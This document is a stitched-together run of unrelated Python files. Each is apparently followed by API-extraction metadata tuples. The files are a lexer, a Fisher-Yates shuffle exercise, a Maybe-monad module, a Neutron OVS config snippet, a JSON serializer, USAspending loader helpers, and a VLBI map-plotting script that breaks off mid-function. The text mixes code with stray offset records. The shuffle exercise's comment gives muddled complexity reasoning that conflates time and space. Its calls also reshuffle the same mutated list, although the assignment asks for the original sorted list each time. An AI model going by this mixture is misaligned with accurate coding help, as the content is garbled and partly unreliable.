'import vedo\n'), ((22206, 22263), 'vedo.colorMap', 'vedo.colorMap', (['mock_values[r_id]', 'color_map', 's_min', 's_max'], {}), '(mock_values[r_id], color_map, s_min, s_max)\n', (22219, 22263), False, 'import vedo\n'), ((39472, 39488), 'numpy.array', 'np.array', (['normal'], {}), '(normal)\n', (39480, 39488), True, 'import numpy as np\n'), ((40152, 40171), 'numpy.array', 'np.array', (['alpha_map'], {}), '(alpha_map)\n', (40160, 40171), True, 'import numpy as np\n'), ((40215, 40238), 'numpy.ones_like', 'np.ones_like', (['alpha_map'], {}), '(alpha_map)\n', (40227, 40238), True, 'import numpy as np\n'), ((40441, 40460), 'numpy.array', 'np.array', (['alpha_map'], {}), '(alpha_map)\n', (40449, 40460), True, 'import numpy as np\n'), ((10848, 10867), 'glob.glob', 'glob.glob', (['inputobj'], {}), '(inputobj)\n', (10857, 10867), False, 'import glob\n'), ((11232, 11270), 'vtk.vtkFixedPointVolumeRayCastMapper', 'vtk.vtkFixedPointVolumeRayCastMapper', ([], {}), '()\n', (11268, 11270), False, 'import vtk\n'), ((12048, 12066), 'vtk.vtkBMPReader', 'vtk.vtkBMPReader', ([], {}), '()\n', (12064, 12066), False, 'import vtk\n'), ((12167, 12190), 'vtk.vtkImageMagnitude', 'vtk.vtkImageMagnitude', ([], {}), '()\n', (12188, 12190), False, 'import vtk\n'), ((12540, 12558), 'numpy.array', 'np.array', (['inputobj'], {}), '(inputobj)\n', (12548, 12558), True, 'import numpy as np\n'), ((12630, 12670), 'vedo.numpy2vtk', 'vedo.numpy2vtk', (['inputobj'], {'dtype': 'np.float'}), '(inputobj, dtype=np.float)\n', (12644, 12670), False, 'import vedo\n'), ((13242, 13327), 'vedo.colors.printc', 'vedo.colors.printc', (['"""Error: must set dimensions (dims keyword) in Volume."""'], {'c': '"""r"""'}), "('Error: must set dimensions (dims keyword) in Volume.',\n c='r')\n", (13260, 13327), False, 'import vedo\n'), ((5623, 5644), 'iblviewer.utils.time_diff', 'utils.time_diff', (['time'], {}), '(time)\n', (5638, 5644), True, 'import iblviewer.utils as utils\n'), ((14629, 14652), 'vedo.io.loadImageData', 'loadImageData', (['inputobj'], {}), '(inputobj)\n', (14642, 14652), False, 'from vedo.io import loadImageData, download\n'), ((14680, 14765), 'vedo.colors.printc', 'vedo.colors.printc', (['"""Volume(): cannot understand input type:\n"""', 'inputtype'], {'c': '"""r"""'}), "('Volume(): cannot understand input type:\\n', inputtype,\n c='r')\n", (14698, 14765), False, 'import vedo\n'), ((14577, 14610), 'vedo.io.download', 'download', (['inputobj'], {'verbose': '(False)'}), '(inputobj, verbose=False)\n', (14585, 14610), False, 'from vedo.io import loadImageData, download\n')] |
# Copyright (c) 2013 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from rply import LexerGenerator
lg = LexerGenerator()
# A regexp for something that should end a quoting/unquoting operator
# i.e. a space or a closing brace/paren/curly
end_quote = r'(?![\s\)\]\}])'
lg.add('LPAREN', r'\(')
lg.add('RPAREN', r'\)')
lg.add('LBRACKET', r'\[')
lg.add('RBRACKET', r'\]')
lg.add('LCURLY', r'\{')
lg.add('RCURLY', r'\}')
lg.add('HLCURLY', r'#\{')
lg.add('QUOTE', r'\'%s' % end_quote)
lg.add('QUASIQUOTE', r'`%s' % end_quote)
lg.add('UNQUOTESPLICE', r'~@%s' % end_quote)
lg.add('UNQUOTE', r'~%s' % end_quote)
lg.add('HASHBANG', r'#!.*[^\r\n]')
lg.add('HASHREADER', r'#[^{]')
# A regexp which matches incomplete strings, used to support
# multi-line strings in the interpreter
partial_string = r'''(?x)
(?:u|r|ur|ru)? # prefix
" # start string
(?:
| [^"\\] # non-quote or backslash
| \\(.|\n) # or escaped single character or newline
| \\x[0-9a-fA-F]{2} # or escaped raw character
| \\u[0-9a-fA-F]{4} # or unicode escape
| \\U[0-9a-fA-F]{8} # or long unicode escape
)* # one or more times
'''
lg.add('STRING', r'%s"' % partial_string)
lg.add('PARTIAL_STRING', partial_string)
lg.add('IDENTIFIER', r'[^()\[\]{}\'"\s;]+')
lg.ignore(r';.*(?=\r|\n|$)')
lg.ignore(r'\s+')
lexer = lg.build()
| [
"rply.LexerGenerator"
]
| [((1136, 1152), 'rply.LexerGenerator', 'LexerGenerator', ([], {}), '()\n', (1150, 1152), False, 'from rply import LexerGenerator\n')] |
# Python provides a built-in method called random.shuffle that will shuffle the list data type. Do not use this.
# For this assignment, you are to create your own shuffle algorithm that will take as input a sorted list and randomly shuffle the items before returning the list. Try to make your algorithm as efficient as possible.
# Add a comment to your code stating what the time complexity of your algorithm is and why.
# Display list before and after shuffle. Call your shuffle function multiple times, each time on the original sorted list to show the random order of the list items.
data = [7, 20, 26, 31, 40, 51, 55, 63, 74, 81]
ndata = len(data)
import random
def shuffleAlgorithm(data, ndata):
for i in range(ndata-1, 0, -1):
r = random.randint(0, i)
data[i], data[r] = data[r], data[i]
return data
print(data)
print(shuffleAlgorithm(data,ndata))
print(shuffleAlgorithm(data,ndata))
print(shuffleAlgorithm(data,ndata))
print(shuffleAlgorithm(data,ndata))
# fisher yates algorithm - O(n) time complexity because i'm not creating a copy of the list to shuffle through it.
# instead i'm modifying the list in place or at a 'constant space' making it O(n)
# swapping the last item with a random -not previously selected- item and repeating until all items in list have been selected | [
"random.randint"
]
| [((755, 775), 'random.randint', 'random.randint', (['(0)', 'i'], {}), '(0, i)\n', (769, 775), False, 'import random\n')] |
from typing import Callable, TypeVar, Union, Tuple
from krogon.infix import Infix
A = TypeVar('A')
B = TypeVar('B')
E = TypeVar('E')
Maybe = Union[Tuple['just', A], Tuple['nothing']]
def just(value=None):
return "just", value
def nothing():
return "nothing", None
def from_value(value) -> Maybe[B]:
return _cast_to_maybe(value)
def from_value_or_default(value, default) -> Maybe[B]:
return from_maybe(
_cast_to_maybe(value),
dict(if_just=lambda x: just(x),
if_nothing=lambda: _cast_to_maybe(default)))
@Infix
def then(maybe: Maybe[A], func: Callable[[A], Maybe[B]]) -> Maybe[B]:
if maybe[0] == "just":
return _cast_to_maybe(func(maybe[1]))
elif maybe[0] == "nothing":
return maybe
@Infix
def catch_nothing(maybe: Maybe[A], func: Callable[[A], Maybe[B]]) -> Maybe[B]:
if maybe[0] == "nothing":
return _cast_to_maybe(func())
elif maybe[0] == "just":
return maybe
@Infix
def map(maybe: Maybe[A], mapper: Callable[[A], B]) -> Maybe[B]:
if maybe[0] == "just":
return just(mapper(maybe[1]))
elif maybe[0] == "nothing":
return maybe
@Infix
def value_or_default(maybe: Maybe[A], default_value: B):
return maybe | from_maybe | (dict(if_just=lambda x: x, if_nothing=lambda: default_value))
@Infix
def from_maybe(maybe: Maybe[A], dict_args: dict) -> B:
if_just: Callable = dict_args['if_just']
if_nothing: Callable = dict_args['if_nothing']
if maybe[0] == "just" and if_just is not None:
return if_just(maybe[1])
elif maybe[0] == "nothing" and if_nothing is not None:
return if_nothing()
else:
raise Exception('Invalid Maybe: {}, {}'.format(maybe, dict_args))
def _cast_to_maybe(result):
if result is None:
return nothing()
if isinstance(result, tuple) and len(result) == 2:
maybe_type, value = result
if maybe_type == "just" or maybe_type == "nothing":
return result
return just(result)
| [
"typing.TypeVar"
]
| [((87, 99), 'typing.TypeVar', 'TypeVar', (['"""A"""'], {}), "('A')\n", (94, 99), False, 'from typing import Callable, TypeVar, Union, Tuple\n'), ((104, 116), 'typing.TypeVar', 'TypeVar', (['"""B"""'], {}), "('B')\n", (111, 116), False, 'from typing import Callable, TypeVar, Union, Tuple\n'), ((121, 133), 'typing.TypeVar', 'TypeVar', (['"""E"""'], {}), "('E')\n", (128, 133), False, 'from typing import Callable, TypeVar, Union, Tuple\n')] |
# Copyright (c) 2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
from oslo_config import cfg
from neutron.conf.agent import ovs_conf as agent_ovs_conf
from neutron.conf.plugins.ml2.drivers import ovs_conf as ml2_ovs_conf
from neutron.privileged.agent.ovsdb.native import helpers as priv_helpers
agent_ovs_conf.register_ovs_agent_opts(cfg.CONF)
ml2_ovs_conf.register_ovs_opts(cfg=cfg.CONF)
enable_connection_uri = functools.partial(
priv_helpers.enable_connection_uri,
log_fail_as_error=False, check_exit_code=False,
timeout=cfg.CONF.OVS.ovsdb_timeout,
inactivity_probe=cfg.CONF.OVS.of_inactivity_probe * 1000)
| [
"functools.partial",
"neutron.conf.agent.ovs_conf.register_ovs_agent_opts",
"neutron.conf.plugins.ml2.drivers.ovs_conf.register_ovs_opts"
]
| [((861, 909), 'neutron.conf.agent.ovs_conf.register_ovs_agent_opts', 'agent_ovs_conf.register_ovs_agent_opts', (['cfg.CONF'], {}), '(cfg.CONF)\n', (899, 909), True, 'from neutron.conf.agent import ovs_conf as agent_ovs_conf\n'), ((910, 954), 'neutron.conf.plugins.ml2.drivers.ovs_conf.register_ovs_opts', 'ml2_ovs_conf.register_ovs_opts', ([], {'cfg': 'cfg.CONF'}), '(cfg=cfg.CONF)\n', (940, 954), True, 'from neutron.conf.plugins.ml2.drivers import ovs_conf as ml2_ovs_conf\n'), ((980, 1184), 'functools.partial', 'functools.partial', (['priv_helpers.enable_connection_uri'], {'log_fail_as_error': '(False)', 'check_exit_code': '(False)', 'timeout': 'cfg.CONF.OVS.ovsdb_timeout', 'inactivity_probe': '(cfg.CONF.OVS.of_inactivity_probe * 1000)'}), '(priv_helpers.enable_connection_uri, log_fail_as_error=\n False, check_exit_code=False, timeout=cfg.CONF.OVS.ovsdb_timeout,\n inactivity_probe=cfg.CONF.OVS.of_inactivity_probe * 1000)\n', (997, 1184), False, 'import functools\n')] |
import json
from .base_serializer import BaseSerializer
class JsonSerializer(BaseSerializer):
'''Json serializer.'''
def _serialize(self, data: dict, **kwargs) -> str:
return json.dumps(data)
def _deserialize(self, data: str, **kwargs) -> dict:
return json.loads(data)
| [
"json.loads",
"json.dumps"
]
| [((195, 211), 'json.dumps', 'json.dumps', (['data'], {}), '(data)\n', (205, 211), False, 'import json\n'), ((285, 301), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (295, 301), False, 'import json\n')] |
from datetime import datetime
import warnings
import logging
from django.db.models import Q, Case, Value, When
from django.core.cache import caches, CacheKeyWarning
import django.apps
from usaspending_api.references.models import Agency, Location, RefCountryCode
from usaspending_api.references.helpers import canonicalize_location_dict
from usaspending_api.submissions.models import SubmissionAttributes
from usaspending_api.data.daims_maps import daims_maps
warnings.simplefilter("ignore", CacheKeyWarning)
def clear_caches():
for cache_name in ('default', 'locations', 'awards'):
caches[cache_name].clear()
def cleanse_values(row):
"""
Remove textual quirks from CSV values.
"""
row = {k: v.strip() for (k, v) in row.items()}
row = {k: (None if v.lower() == 'null' else v) for (k, v) in row.items()}
return row
def convert_date(date):
if date == "":
return None
return datetime.strptime(date, '%m/%d/%Y').strftime('%Y-%m-%d')
def get_subtier_agency_dict():
"""Returns a dictionary with key = subtier agency code and value = agency id."""
# there's no unique constraint on subtier_code, so the order by below ensures that in the case of duplicate subtier
# codes, the dictionary we return will reflect the most recently updated one
agencies = Agency.objects.all().values(
'id',
'subtier_agency__subtier_code').order_by('subtier_agency__update_date')
subtier_agency_dict = {
a['subtier_agency__subtier_code']: a['id'] for a in agencies
}
return subtier_agency_dict
def fetch_country_code(vendor_country_code):
code_str = up2colon(vendor_country_code)
if code_str == "":
return None
country_code = RefCountryCode.objects.filter(Q(country_code=code_str) | Q(country_name__iexact=code_str)).first()
if not country_code:
# We don't have an exact match on the name or the code, so we need to
# chain filter on the name
query_set = RefCountryCode.objects
for word in code_str.split():
query_set = query_set.filter(country_name__icontains=word)
country_code = query_set.first()
return country_code
location_cache = caches['locations']
def get_or_create_location(row, mapper):
location_dict = mapper(row)
# Country-specific adjustments
if location_dict["location_country_code"] == "USA":
# Apparently zip codes are optional...
if location_dict["location_zip"]:
location_dict.update(
zip5=location_dict["location_zip"][:5],
zip_last4=location_dict["location_zip"][5:])
location_dict.pop("location_zip")
else:
location_dict.update(
foreign_postal_code=location_dict.pop("location_zip", None),
foreign_province=location_dict.pop("state_code", None))
if "city_name" in location_dict:
location_dict['foreign_city_name'] = location_dict.pop("city_name")
location_dict = canonicalize_location_dict(location_dict)
location_tup = tuple(location_dict.items())
location = location_cache.get(location_tup)
if location:
return location
location = Location.objects.filter(**location_dict).first()
if not location:
location = Location.objects.create(**location_dict)
location_cache.set(location_tup, location)
return location
def up2colon(input_string):
'Takes the part of a string before `:`, if any.'
if input_string:
return input_string.split(':')[0].strip()
return ''
def parse_numeric_value(string):
try:
return float(string)
except Exception:
return None
def get_fiscal_quarter(fiscal_reporting_period):
"""
Return the fiscal quarter.
Note: the reporting period being passed should already be in "federal fiscal format",
where period 1 = Oct. and period 12 = Sept.
"""
if fiscal_reporting_period in [1, 2, 3]:
return 1
elif fiscal_reporting_period in [4, 5, 6]:
return 2
elif fiscal_reporting_period in [7, 8, 9]:
return 3
elif fiscal_reporting_period in [10, 11, 12]:
return 4
def get_previous_submission(cgac_code, fiscal_year, fiscal_period):
"""
For the specified CGAC (e.g., department/top-tier agency) and specified fiscal year and quarter, return the
previous submission within the same fiscal year.
"""
previous_submission = SubmissionAttributes.objects \
.filter(
cgac_code=cgac_code,
reporting_fiscal_year=fiscal_year,
reporting_fiscal_period__lt=fiscal_period,
quarter_format_flag=True) \
.order_by('-reporting_fiscal_period') \
.first()
return previous_submission
def update_model_description_fields():
"""
This method searches through every model Django has registered, checks if it
belongs to a list of apps we should update, and updates all fields with
'_description' at the end with their relevant information.
Dictionaries for DAIMS definitions should be stored in:
usaspending_api/data/daims_maps.py
Each map should be <field_name>_map for discoverability.
If there are conflicting maps (i.e., two models use type_description, but
different enumerations) prepend the map name with the model name and a dot.
For examples of these situations, see the documentation in daims_maps.py
"""
logger = logging.getLogger('console')
# This is a list of apps whose models will be checked for description fields
updatable_apps = [
"accounts",
"awards",
"common",
"financial_activities",
"references",
"submissions"
]
# This iterates over every model that Django has registered
for model in django.apps.apps.get_models():
# This checks the app_label of the model, and thus we can skip it if it is not in one of our updatable_apps.
# Thus, we'll skip any django admin apps, like auth, corsheaders, etc.
if model._meta.app_label not in updatable_apps:
continue
if model.__name__[:10] == "Historical":
continue
model_fields = [f.name for f in model._meta.get_fields()]
# This supports multi-case DAIMS
# We must filter on the model level rather than add them to the when clauses, because if there is a FK in the
# when clause Django is not guaranteed to join on that table properly.
#
# This is an array of tuples of the following format
# (Q object of filter, field_names -> case objects map for this filter)
#
# It is initialized with a blank filter and empty list, which is where default updates are stored
model_filtered_update_case_map = [(Q(), {})]
desc_fields = [field for field in model_fields if field.split('_')[-1] ==
"description"[:len(field.split('_')[-1])]]
non_desc_fields = [field for field in model_fields if field not in desc_fields]
desc_fields_mapping = {}
for desc_field in desc_fields:
actual_field_short = "_".join(desc_field.split('_')[:-1])
actual_field = None
for field in non_desc_fields:
if actual_field_short == field:
actual_field = field
elif actual_field_short == field[:len(actual_field_short)]:
actual_field = field
desc_fields_mapping[desc_field] = actual_field
# Loop through each of the models fields to construct a case for each applicable field
for field in model_fields:
# We're looking for field names ending in _description
split_name = field.split("_")
# If the last element in our split name isn't description, skip it
if len(split_name) == 1 or split_name[-1] != "description"[:len(split_name[-1])]:
continue
source_field = "_".join(split_name[:-1])
destination_field = field
# This is the map name, prefixed by model name for when there are non-unique description fields
source_field = desc_fields_mapping[field] if field in desc_fields_mapping else source_field
model_map_name = "{}.{}_map".format(model.__name__, source_field)
map_name = "{}_map".format(source_field)
# This stores a direct reference to the enumeration mapping
code_map = None
# Validate we have the source field
if source_field not in model_fields:
logger.debug("Tried to update '{}' on model '{}', but source field '{}' does not exist.".
format(destination_field, model.__name__, source_field))
continue
# Validate we have a map
# Prefer model_map_name over map_name
if model_map_name in daims_maps.keys():
code_map = daims_maps[model_map_name]
elif map_name in daims_maps.keys():
code_map = daims_maps[map_name]
else:
logger.warn("Tried to update '{}' on model '{}', but neither map '{}' nor '{}' exists.".
format(destination_field, model.__name__, model_map_name, map_name))
continue
# Cases start from 1
case_number = 1
case_name = "case_1"
case_map = "case_1_map"
while case_name in code_map.keys():
case_object = create_case(code_map[case_map], source_field)
# Construct a Q filter for this case
case_filter = Q(**code_map[case_name])
# See if we already have a tuple for this filter
case_tuple = [x for x in model_filtered_update_case_map if x[0] == case_filter]
if len(case_tuple) == 0:
# We don't, so create the tuple
temp_case_dict = {}
temp_case_dict[field] = case_object
model_filtered_update_case_map.append((case_filter, temp_case_dict))
else:
# We do, so just add our case object to that dictionary
case_tuple[0][1][field] = case_object
# Check for the next case
case_number += 1
case_name = "case_{}".format(case_number)
case_map = "case_{}_map".format(case_number)
# If our case number is still 1, then we didn't have any cases. Therefore, we perform the default
if case_number == 1:
case_object = create_case(code_map, source_field)
# Grab the first tuple, which has no filters
case_tuple = model_filtered_update_case_map[0]
# Add it to our dictionary
case_tuple[1][field] = case_object
for filter_tuple in model_filtered_update_case_map:
# For each filter tuple, check if the dictionary has any entries
if len(filter_tuple[1].keys()) > 0:
print("Updating model {}\n FILTERS:\n {}\n FIELDS:\n {}".
format(model.__name__, str(filter_tuple[0]), "\n ".join(filter_tuple[1].keys())))
try:
model.objects.filter(filter_tuple[0]).update(**filter_tuple[1])
except django.db.utils.ProgrammingError as e:
logger.warn(str(e))
logger.warn("(OK if invoked from a migration, when the table may not yet have been created)")
# Utility method for update_model_description_fields, creates the Case object
def create_case(code_map, source_field):
when_list = []
default = None
for code in code_map.keys():
when_args = {}
when_args[source_field] = code
when_args["then"] = Value(code_map[code])
# If our code is blank, change the comparison to ""
if code == "_BLANK":
when_args[source_field] = Value("")
# We handle the default case later
if code == "_DEFAULT":
default = Value(code_map[code])
continue
# Append a new when to our when-list
when_list.append(When(**when_args))
return Case(*when_list, default=default)
| [
"logging.getLogger",
"usaspending_api.references.models.Location.objects.filter",
"datetime.datetime.strptime",
"usaspending_api.submissions.models.SubmissionAttributes.objects.filter",
"usaspending_api.references.models.Location.objects.create",
"usaspending_api.references.helpers.canonicalize_location_dict",
"django.db.models.Case",
"django.db.models.Value",
"warnings.simplefilter",
"django.db.models.When",
"django.db.models.Q",
"usaspending_api.data.daims_maps.daims_maps.keys",
"usaspending_api.references.models.Agency.objects.all"
]
| [((463, 511), 'warnings.simplefilter', 'warnings.simplefilter', (['"""ignore"""', 'CacheKeyWarning'], {}), "('ignore', CacheKeyWarning)\n", (484, 511), False, 'import warnings\n'), ((3005, 3046), 'usaspending_api.references.helpers.canonicalize_location_dict', 'canonicalize_location_dict', (['location_dict'], {}), '(location_dict)\n', (3031, 3046), False, 'from usaspending_api.references.helpers import canonicalize_location_dict\n'), ((5468, 5496), 'logging.getLogger', 'logging.getLogger', (['"""console"""'], {}), "('console')\n", (5485, 5496), False, 'import logging\n'), ((12330, 12363), 'django.db.models.Case', 'Case', (['*when_list'], {'default': 'default'}), '(*when_list, default=default)\n', (12334, 12363), False, 'from django.db.models import Q, Case, Value, When\n'), ((3290, 3330), 'usaspending_api.references.models.Location.objects.create', 'Location.objects.create', ([], {}), '(**location_dict)\n', (3313, 3330), False, 'from usaspending_api.references.models import Agency, Location, RefCountryCode\n'), ((11928, 11949), 'django.db.models.Value', 'Value', (['code_map[code]'], {}), '(code_map[code])\n', (11933, 11949), False, 'from django.db.models import Q, Case, Value, When\n'), ((933, 968), 'datetime.datetime.strptime', 'datetime.strptime', (['date', '"""%m/%d/%Y"""'], {}), "(date, '%m/%d/%Y')\n", (950, 968), False, 'from datetime import datetime\n'), ((3201, 3241), 'usaspending_api.references.models.Location.objects.filter', 'Location.objects.filter', ([], {}), '(**location_dict)\n', (3224, 3241), False, 'from usaspending_api.references.models import Agency, Location, RefCountryCode\n'), ((12078, 12087), 'django.db.models.Value', 'Value', (['""""""'], {}), "('')\n", (12083, 12087), False, 'from django.db.models import Q, Case, Value, When\n'), ((12185, 12206), 'django.db.models.Value', 'Value', (['code_map[code]'], {}), '(code_map[code])\n', (12190, 12206), False, 'from django.db.models import Q, Case, Value, When\n'), ((12299, 12316), 'django.db.models.When', 'When', ([], {}), '(**when_args)\n', (12303, 12316), False, 'from django.db.models import Q, Case, Value, When\n'), ((6812, 6815), 'django.db.models.Q', 'Q', ([], {}), '()\n', (6813, 6815), False, 'from django.db.models import Q, Case, Value, When\n'), ((8951, 8968), 'usaspending_api.data.daims_maps.daims_maps.keys', 'daims_maps.keys', ([], {}), '()\n', (8966, 8968), False, 'from usaspending_api.data.daims_maps import daims_maps\n'), ((9703, 9727), 'django.db.models.Q', 'Q', ([], {}), '(**code_map[case_name])\n', (9704, 9727), False, 'from django.db.models import Q, Case, Value, When\n'), ((1324, 1344), 'usaspending_api.references.models.Agency.objects.all', 'Agency.objects.all', ([], {}), '()\n', (1342, 1344), False, 'from usaspending_api.references.models import Agency, Location, RefCountryCode\n'), ((1766, 1790), 'django.db.models.Q', 'Q', ([], {'country_code': 'code_str'}), '(country_code=code_str)\n', (1767, 1790), False, 'from django.db.models import Q, Case, Value, When\n'), ((1793, 1825), 'django.db.models.Q', 'Q', ([], {'country_name__iexact': 'code_str'}), '(country_name__iexact=code_str)\n', (1794, 1825), False, 'from django.db.models import Q, Case, Value, When\n'), ((4456, 4625), 'usaspending_api.submissions.models.SubmissionAttributes.objects.filter', 'SubmissionAttributes.objects.filter', ([], {'cgac_code': 'cgac_code', 'reporting_fiscal_year': 'fiscal_year', 'reporting_fiscal_period__lt': 'fiscal_period', 'quarter_format_flag': '(True)'}), '(cgac_code=cgac_code,\n reporting_fiscal_year=fiscal_year, reporting_fiscal_period__lt=\n fiscal_period, quarter_format_flag=True)\n', (4491, 4625), False, 'from usaspending_api.submissions.models import SubmissionAttributes\n'), ((9053, 9070), 'usaspending_api.data.daims_maps.daims_maps.keys', 'daims_maps.keys', ([], {}), '()\n', (9068, 9070), False, 'from usaspending_api.data.daims_maps import daims_maps\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 21 11:11:56 2020
This program is use to plot polarization map from vlbi fits image.
You should specify the input fits images by -i or --infile,
output file by -o or --output,
contour levs by -l or --levs
contour base by -c or --cmul
polarization parameters by -p or --pol: "icut pcut inc scale"
plot window by -w or --win
restore beam position by -b or --bpos
figsize by -f or --figsize
Installation:
1. copy file
chmod a+x mapplot.py
cp mapplot.py ~/myapp
2. set envioment parameters
Add the following line to ~/.bashrc
export PATH=$PATH:/home/usename/myapp
source ~/.bashrc
Running like this:
mapplot.py -w <win> -f <figsize> -n <normalize> <infile> <cmul>
mapplot.py i <input file list> -o <out.pdf> -c <cmul> -w <win> -p <pol>
Examples:
1. mapplot.py -i cta102.fits -o cta102-color.pdf -c 1.8e-3 -w '18 -8 -20 6' -f '7 6' -n 'power 0.5'
2. mapplot.py -w '18 -8 -20 6' -f '4.0 6' -n 'power 0.5' cta102.fits 1.8e-3
https://matplotlib.org/3.1.1/tutorials/colors/colormaps.html
https://matplotlib.org/3.2.1/api/_as_gen/matplotlib.colors.Normalize.html#matplotlib.colors.Normalize
@author: <NAME>
Shanghai Astronomical Observatory, Chinese Academy of Sciences
E-mail: <EMAIL>; <EMAIL>
"""
import sys
import getopt
from astropy.io import fits
from astropy.table import Table
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.patches import Ellipse
import matplotlib.colors as mcolors
def add_beam(ax, win, h, bpos=None, pad=2.0):
if bpos==None :
x = win[0] - pad * h['bmaj']*3.6E6
y = win[2] + pad * h['bmaj']*3.6E6
bpos = (x, y)
bmaj = h['bmaj'] * 3.6E6
bmin = h['bmin'] * 3.6E6
bpa = 90 - h['bpa']
e = Ellipse(bpos, bmaj, bmin, angle=bpa, ec='k', facecolor='gray')
ax.add_artist(e)
def annotate(ax, notefile=''):
if notefile != '':
tab = Table.read(notefile, format='csv')
for t in tab:
ax.text(t['x'], t['y'], t['text'])
# ax.annotate('%s' % h['object'], xy=(0.125,0.91), xycoords='figure fraction')
# ax.annotate('%.1f GHz' % (h['crval3']/1.0E9), xy=(0.83, 0.91), xycoords='figure fraction')
def cut_cmap(cmap, N_cut=0):
# cmap = mcolors.Colormap(cmap)
cmap = plt.get_cmap(cmap)
x = np.arange(N_cut, 256) / 256.0
color_index = cmap(x)
cmap = mcolors.ListedColormap(color_index)
return cmap
def get_normalize(args, vmin=0.0, vmax=1.0):
if args == '':
norm = mcolors.Normalize(vmin, vmax)
args = args.split(' ')
name = args[0]
if name == 'linear':
if len(args)==3:
vmin, vmax = np.array(args[1:], dtype='f4')
norm = mcolors.Normalize(vmin, vmax, True)
elif name == 'power':
if len(args)==1:
gamma = 0.5
if len(args)==2:
gamma = float(args[1])
elif len(args)==4:
gamma, vmin, vmax = np.array(args[1:], dtype='f4')
if gamma < 1.0 and vmin < 0.0:
vmin = 0.0
norm = mcolors.PowerNorm(gamma, vmin, vmax, True)
elif name == 'log':
if len(args)==3:
vmin, vmax = np.array(args[1:], dtype='f4')
norm = mcolors.LogNorm(vmin, vmax)
elif name == 'symlog':
if len(args)==2:
linthresh = float(args[1])
linscale = 1.0
elif len(args)==3:
linthresh, linscale = np.array(args[1:], dtype='f4')
elif len(args)==5:
linthresh, linscale, vmin, vmax = np.array(args[1:], dtype='f4')
norm = mcolors.SymLogNorm(linthresh, linscale, vmin, vmax)
elif name == 'twoslope':
if len(args)==2:
vcenter = float(args[1])
elif len(args)==4:
vcenter, vmin, vmax = np.array(args[1:], dtype='f4')
norm = mcolors.TwoSlopeNorm(vcenter, vmin, vmax)
return norm
def add_annotation(ax, infile=''):
if infile == '':
return
with open(infile, 'r') as f:
for line in f.readlines():
row = line.split(',')
row = [col.strip() for col in row]
typ = row[0]
args = row[1:]
if typ == 'text':
x, y, text = args
x, y = float(x), float(y)
ax.text(x, y, text)
elif typ == 'arrow':
x1, y1, x2, y2 = np.array(args, dtype='f4')
ax.annotate("", xy=(x1, y1), xytext=(x2, y2),
arrowprops=dict(arrowstyle="->", connectionstyle="arc3"))
elif typ == 'annotation':
x1, y1, x2, y2 = np.array(args[:-1], dtype='f4')
text = args[-1]
ax.annotate(text, xy=(x1, y1), xytext=(x2, y2),
arrowprops=dict(arrowstyle="->", connectionstyle="arc3"))
elif typ == 'ellipse':
x, y, majax, minax, pa = np.array(args, dtype='f4')
e = Ellipse((x,y), majax, minax, angle=pa, lw=0.5, fc='none', ec='k', ls='-')
ax.add_artist(e)
def set_axis(ax, w):
ax.set_aspect('equal')
ax.set_xlabel('Relative R.A. (mas)')
ax.set_ylabel('Relative Dec. (mas)')
ax.set_xlim(w[0],w[1])
ax.set_ylim(w[2],w[3])
ax.tick_params(which='both', direction='in', length=6, right=True, top=True)
ax.tick_params(which='minor',length=4)
ax.minorticks_on()
def word2pix(w, h):
if w == None:
W = [0, h['naxis1'], 0, h['naxis2']]
else:
x0, x1, y0, y1 = w
X0 = h['crpix1'] + x0/(h['cdelt1']*3.6E6)
Y0 = h['crpix2'] + y0/(h['cdelt2']*3.6E6)
X1 = h['crpix1'] + x1/(h['cdelt1']*3.6E6)
Y1 = h['crpix2'] + y1/(h['cdelt2']*3.6E6)
W = [int(X0), int(X1), int(Y0), int(Y1)]
return W
def pix2word(W, h):
if W == None:
W = [0, h['naxis1'], 0, h['naxis2']]
X0, X1, Y0, Y1 = W
x0 = h['cdelt1']*3.6E6 * (X0-h['crpix1'])
y0 = h['cdelt2']*3.6E6 * (Y0-h['crpix2'])
x1 = h['cdelt1']*3.6E6 * (X1-h['crpix1'])
y1 = h['cdelt2']*3.6E6 * (Y1-h['crpix2'])
w = [x0, x1, y0, y1]
return w
def savefig(outfile, dpi=100):
if outfile.lower().endswith('.pdf') :
plt.savefig(outfile)
elif outfile.lower().endswith('.jpg') or outfile.lower().endswith('.jpeg'):
plt.savefig(outfile, dpi=dpi)
elif outfile.lower().endswith('.png'):
plt.savefig(outfile, dpi=dpi)
def mapplot(infile, cmul, outfile='', win=None, levs=None, bpos=None,
figsize=None, dpi=100, annotationfile='', cmap='', N_cut=0,
norm='', fraction=0.05):
hdul = fits.open(infile)
h = hdul[0].header
# img = hdul[0].data[0, 0, :, :]
if levs==None:
levs = cmul*np.array([-1,1,2,4,8,16,32,64,128,256,512,1024,2048,4096])
# print(win)
if figsize == None :
figsize = (6, 6)
if win == None:
win = pix2word(None, h)
W = word2pix(None, h)
else:
W = word2pix(win, h)
img = hdul[0].data[0, 0, W[2]:W[3], W[0]:W[1]]
if cmap == '':
cmap = 'rainbow'
cmap = cut_cmap(cmap, N_cut)
